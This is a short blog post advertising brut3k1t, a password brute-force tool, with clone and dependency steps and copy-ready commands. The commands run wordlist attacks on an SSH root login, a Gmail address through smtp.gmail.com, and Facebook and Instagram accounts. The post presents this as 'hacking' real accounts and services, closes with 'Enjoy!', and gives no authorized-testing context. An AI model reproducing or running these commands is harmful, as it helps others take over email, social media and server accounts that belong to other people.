> Bruteforce Server Module: brut3k1t
☠️brut3k1t is a bruteforce server module that supports dictionary lookup attacks for multiple protocols. Current and completed protocols that are already supported:
>ssh
>ftp
>smtp
>Xmpp
In the future, it is planned to implement various protocols and services (including Twitter, Facebook, Instagram).
🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :
1️⃣git clone https://github.com/ex0dus-0x/brute.git
2️⃣DEPENCIES :
argparse - Used to parse command line arguments
paramiko - Used to work with SSH connections and authentication
ftplib - Used for working with FTP connections and authentication
smtplib - Used to work with SMTP (email) connections and authentication
fbchat - Used to connect to Facebook
selenium - Used for web bonding that is used with Instagram (and later on Twitter)
xmppy - used for XMPP connections ... and much more in the future
3️⃣cd / path / to / brut3k1t
4️⃣Enter python brut3k1t -h and this will bring up a help menu..
🦑Examples of using:
Hacking an SSH server running on 192.168.1.3 using root and wordlist.txt as a wordlist.
python brut3k1t.py -s ssh -a 192.168.1.3 -u root -w wordlist.txt
The program will automatically set the port to 22, but if it is different, specify -p mark.
Hacking test@gmail.com email with wordlist.txt on port 25 with a 3 second delay. For email, you must use the SMTP server address. For example, for Gmail = smtp.gmail.com. You can research this question with Google.
python brut3k1t.py -s smtp -a smtp.gmail.com -u test@gmail.com -w wordlist.txt -p 25 -d 3
Hacking Facebook is a real challenge as you will need a target user ID, not a username.
python brut3k1t.py -s facebook -u 1234567890 -w wordlist.txt
Hacking Instagram with the username test with wordlist wordlist.txt, as well as with a 5 second delay
python brut3k1t.py -s instagram -u test -w wordlist.txt -d 5
Enjoy! Follow us for more...
No comments:
Post a Comment